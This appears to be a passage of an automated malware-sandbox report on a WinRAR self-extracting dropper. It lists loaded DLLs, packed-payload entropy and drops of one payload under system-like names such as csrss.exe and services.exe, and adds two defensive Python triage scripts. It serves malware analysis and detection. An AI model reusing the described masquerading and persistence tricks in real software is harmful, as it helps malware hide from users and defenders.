Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
Source: C:\Windows\System32\PING.EXE Section loaded: dnsapi.dll
Source: C:\Windows\System32\PING.EXE Section loaded: rasadhlp.dll
Source: C:\Windows\System32\PING.EXE Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\PING.EXE Section loaded: winnsi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: mscoree.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: apphelp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: version.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: uxtheme.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: windows.storage.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: wldp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: profapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: cryptsp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: rsaenh.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: cryptbase.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: sspicli.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ktmw32.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: rasapi32.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: rasman.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: rtutils.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: mswsock.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: winhttp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: iphlpapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: dnsapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: winnsi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: rasadhlp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: fwpuclnt.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: wbemcomn.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: dwrite.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: edputil.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: amsi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: userenv.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: winmm.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: winmmbase.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: mmdevapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: devobj.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ksuser.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: avrt.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: audioses.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: powrprof.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: umpdc.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: msacm32.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: midimap.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: windowscodecs.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ntmarta.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: dpapi.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: secur32.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: schannel.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: mskeyprotect.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ntasn1.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ncrypt.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: ncryptsslp.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: msasn1.dll
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe Section loaded: samcli.dll
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\portintosvc\driverInto.exe Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe
Source: C:\portintosvc\driverInto.exe Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\931b00cae9730a
Source: Vqzx4PFehn.exe Static file information: File size 1789751 > 1048576
Source: Vqzx4PFehn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Vqzx4PFehn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Vqzx4PFehn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Vqzx4PFehn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Vqzx4PFehn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Vqzx4PFehn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Vqzx4PFehn.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Vqzx4PFehn.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Vqzx4PFehn.exe
Source: Vqzx4PFehn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Vqzx4PFehn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Vqzx4PFehn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Vqzx4PFehn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Vqzx4PFehn.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe File created: C:\portintosvc\__tmp_rar_sfx_access_check_6348156
Source: Vqzx4PFehn.exe Static PE information: section name: .didat
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101F640 push ecx; ret 0_2_0101F653
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe Code function: 0_2_0101EB78 push eax; ret 0_2_0101EB96
Source: C:\portintosvc\driverInto.exe Code function: 4_2_00007FFD9BAC4B99 push ebp; retf 4_2_00007FFD9BAC4BA2
Source: C:\portintosvc\driverInto.exe Code function: 4_2_00007FFD9BEBF167 push esi; ret 4_2_00007FFD9BEBF170
Source: C:\portintosvc\driverInto.exe Code function: 4_2_00007FFD9BEBF10B push eax; ret 4_2_00007FFD9BEBF10C
Source: C:\portintosvc\driverInto.exe Code function: 4_2_00007FFD9BEBF000 push edi; ret 4_2_00007FFD9BEBF001
Source: driverInto.exe.0.dr Static PE information: section name: .text entropy: 7.542871166746595
Source: csrss.exe.4.dr Static PE information: section name: .text entropy: 7.542871166746595
Source: services.exe.4.dr Static PE information: section name: .text entropy: 7.542871166746595
Source: XXPWErhsUbDrk.exe.4.dr Static PE information: section name: .text entropy: 7.542871166746595
Source: XXPWErhsUbDrk.exe0.4.dr Static PE information: section name: .text entropy: 7.542871166746595
Source: XXPWErhsUbDrk.exe1.4.dr Static PE information: section name: .text entropy: 7.542871166746595
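The six dropped binaries above report the same .text entropy to fifteen decimal places, which is what you expect when one payload is copied under several names (driverInto.exe, csrss.exe, services.exe, XXPWErhsUbDrk.exe). The .didat section on the outer Vqzx4PFehn.exe, by contrast, is the MSVC delay-load import section and is normal for the WinRAR SFX stub the sfxrar.pdb path already identifies. The following is an added triage script, not code from the sandbox or the sample: it parses a PE far enough to reach the section table, scores each section's raw bytes, and flags anything at or above a threshold. The 7.0 bits/byte cut-off is an assumption, and the test PE it builds when run without an argument is constructed data.

```python
"""Per-section Shannon entropy for a PE file using only the standard library.

Added example (not code from the sandbox report or the sample): it parses just
enough of the PE headers to reach the section table, scores every section's raw
bytes, and lists the ones above a packing threshold.
"""
import math
import struct
import sys
from typing import Dict, List, Tuple

# Assumption: 7.0 bits/byte is a common triage cut-off for "compressed or
# encrypted"; it is not a constant taken from the sandbox.
PACKED_THRESHOLD = 7.0


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty or constant data, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_sections(image: bytes) -> List[Tuple[str, bytes]]:
    """(name, raw file bytes) for each entry in the section table."""
    if image[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (num_sections,) = struct.unpack_from("<H", image, coff + 2)
    (opt_size,) = struct.unpack_from("<H", image, coff + 16)
    table = coff + 20 + opt_size  # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + i * 40
        name = image[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", image, off + 16)
        sections.append((name, image[raw_ptr:raw_ptr + raw_size]))
    return sections


def section_entropy(image: bytes) -> Dict[str, float]:
    return {name: shannon_entropy(raw) for name, raw in pe_sections(image)}


def suspicious_sections(image: bytes, threshold: float = PACKED_THRESHOLD) -> List[str]:
    return [name for name, e in section_entropy(image).items() if e >= threshold]


def build_test_pe(sections: List[Tuple[bytes, bytes]]) -> bytes:
    """Constructed test data: a minimal PE32 whose headers are valid as far as
    the section table, so the parser can be exercised without a real sample."""
    opt_size = 0xE0                                # PE32 optional header length
    e_lfanew = 0x40
    table = e_lfanew + 4 + 20 + opt_size
    headers_end = table + 40 * len(sections)
    first_raw = (headers_end + 0x1FF) & ~0x1FF     # 512-byte file alignment
    hdr = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew))
    hdr += b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, opt_size, 0x102)
    hdr += struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)   # PE32 magic, rest zeroed
    body = bytearray()
    for i, (name, data) in enumerate(sections):
        raw_ptr = first_raw + len(body)
        hdr += name.ljust(8, b"\0") + struct.pack(
            "<IIIIIIHHI", len(data), 0x1000 * (i + 1), len(data), raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data + b"\0" * (-len(data) % 0x200)
    return bytes(hdr) + b"\0" * (first_raw - len(hdr)) + bytes(body)


if __name__ == "__main__":
    # python pe_entropy.py <file.exe>; without an argument, score the constructed PE.
    image = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_test_pe(
        [(b".text", bytes(range(256)) * 16), (b".rdata", b"ABCD" * 64), (b".data", b"\0" * 1024)])
    for name, e in section_entropy(image).items():
        flag = "  <-- packed?" if e >= PACKED_THRESHOLD else ""
        print(f"{name:<8} {e:.4f}{flag}")
```

Run it over each dropped file from the report and compare the per-section values; matching numbers across differently named files are a cheap way to confirm they are one payload before spending time on each copy separately.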

Persistence and Installation Behavior

Source: C:\portintosvc\driverInto.exe File created: C:\Windows\Registration\csrss.exe Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Program Files (x86)\Windows Defender\services.exe Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Recovery\XXPWErhsUbDrk.exe Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File created: C:\Users\user\Desktop\nntxgNlb.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\Desktop\cvopZsny.log Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File created: C:\Users\user\Desktop\fJkHwTWu.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File created: C:\Users\user\Desktop\VaRrMrQM.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\Desktop\uCFUtfTN.log Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File created: C:\Users\user\Desktop\TQvqMYlM.log Jump to dropped file
Source: C:\Users\user\Desktop\Vqzx4PFehn.exe File created: C:\portintosvc\driverInto.exe Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\Desktop\DtICHrzA.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\Desktop\SHKzphsQ.log Jump to dropped file
Source: C:\portintosvc\driverInto.exe File created: C:\Users\user\Desktop\EqkKdrOv.log Jump to dropped file
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe File created: C:\Users\user\Desktop\mqRpKNWg.log Jump to dropped file
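The drop locations above are the evidence behind the "Drops PE files with benign system names" and Sigma "Files With System Process Name In Unsuspected Locations" hits: csrss.exe belongs in System32, not C:\Windows\Registration, and services.exe does not belong under the Windows Defender program folder. The randomly named XXPWErhsUbDrk.exe copies in C:\Recovery and C:\Users\Default\Pictures are not caught by that name rule; they fall under the separate "Execution from Suspicious Folder" logic. The script below is an added example, not the sandbox's or the Sigma project's code, that applies both checks to file-creation events. The process-name set, the allowed system directories and the list of expected top-level folders are triage assumptions; the event list is constructed from this report's file-creation lines plus one benign control.

```python
"""Flag dropped executables that reuse Windows system process names outside the
system directories, plus drops into non-standard top-level folders.

Added example, not the sandbox's or the Sigma project's code. The process-name
set, the allowed system directories and the expected top-level folders are
triage assumptions, not an official reference.
"""
from pathlib import PureWindowsPath
from typing import Iterable, List, Tuple

SYSTEM_PROCESS_NAMES = {
    "csrss.exe", "services.exe", "lsass.exe", "smss.exe", "svchost.exe",
    "wininit.exe", "winlogon.exe", "explorer.exe", "spoolsv.exe", "dwm.exe",
}

# Where those binaries legitimately live (explorer.exe sits in C:\Windows itself,
# handled as a special case below). Assumption: extend for your estate.
ALLOWED_PARENTS = [
    PureWindowsPath(r"C:\Windows\System32"),
    PureWindowsPath(r"C:\Windows\SysWOW64"),
    PureWindowsPath(r"C:\Windows\WinSxS"),
    PureWindowsPath(r"C:\Windows\servicing"),
]

# Top-level folders a stock Windows install has; anything else directly under
# the drive root (the report's C:\portintosvc) is worth a look. Assumption.
EXPECTED_ROOTS = {"windows", "program files", "program files (x86)", "programdata",
                  "users", "recovery", "perflogs", "$recycle.bin"}


def _parts(p: PureWindowsPath) -> Tuple[str, ...]:
    """Lower-cased components: NTFS paths are case-insensitive."""
    return tuple(part.lower() for part in p.parts)


def is_under(path: PureWindowsPath, parent: PureWindowsPath) -> bool:
    """Component-wise prefix test, so C:\Windows\System32\drivers still counts."""
    p, q = _parts(path), _parts(parent)
    return p[:len(q)] == q


def is_masquerade(target: str) -> bool:
    """System process name written anywhere except the system directories."""
    path = PureWindowsPath(target)
    name = path.name.lower()
    if name not in SYSTEM_PROCESS_NAMES:
        return False
    if name == "explorer.exe" and _parts(path.parent) == _parts(PureWindowsPath(r"C:\Windows")):
        return False
    return not any(is_under(path.parent, allowed) for allowed in ALLOWED_PARENTS)


def in_unusual_root(target: str) -> bool:
    """Executable under a top-level folder that Windows does not ship with."""
    parts = _parts(PureWindowsPath(target))
    return len(parts) >= 3 and parts[-1].endswith(".exe") and parts[1] not in EXPECTED_ROOTS


def triage(events: Iterable[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """events: (creating process image, created file) -> (reason, image, file)."""
    hits = []
    for image, target in events:
        if is_masquerade(target):
            hits.append(("system-name-outside-system-dir", image, target))
        elif in_unusual_root(target):
            hits.append(("unusual-root-folder", image, target))
    return hits


# Constructed from this report's file-creation lines, plus one benign control event.
SAMPLE_EVENTS = [
    (r"C:\Users\user\Desktop\Vqzx4PFehn.exe", r"C:\portintosvc\driverInto.exe"),
    (r"C:\portintosvc\driverInto.exe", r"C:\Windows\Registration\csrss.exe"),
    (r"C:\portintosvc\driverInto.exe", r"C:\Program Files (x86)\Windows Defender\services.exe"),
    (r"C:\portintosvc\driverInto.exe", r"C:\Recovery\XXPWErhsUbDrk.exe"),
    (r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\csrss.exe"),  # constructed control
]

if __name__ == "__main__":
    for reason, image, target in triage(SAMPLE_EVENTS):
        print(f"{reason:<32} {target}  (written by {image})")
```

Feed it the Image/TargetFilename pairs from Sysmon event ID 11 or the equivalent EDR file-create telemetry; the component-wise comparison matters because a plain string prefix test is fooled by case differences and by look-alike folders such as C:\Windows\System32x.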

Hooking and other Techniques for Hiding and Protection

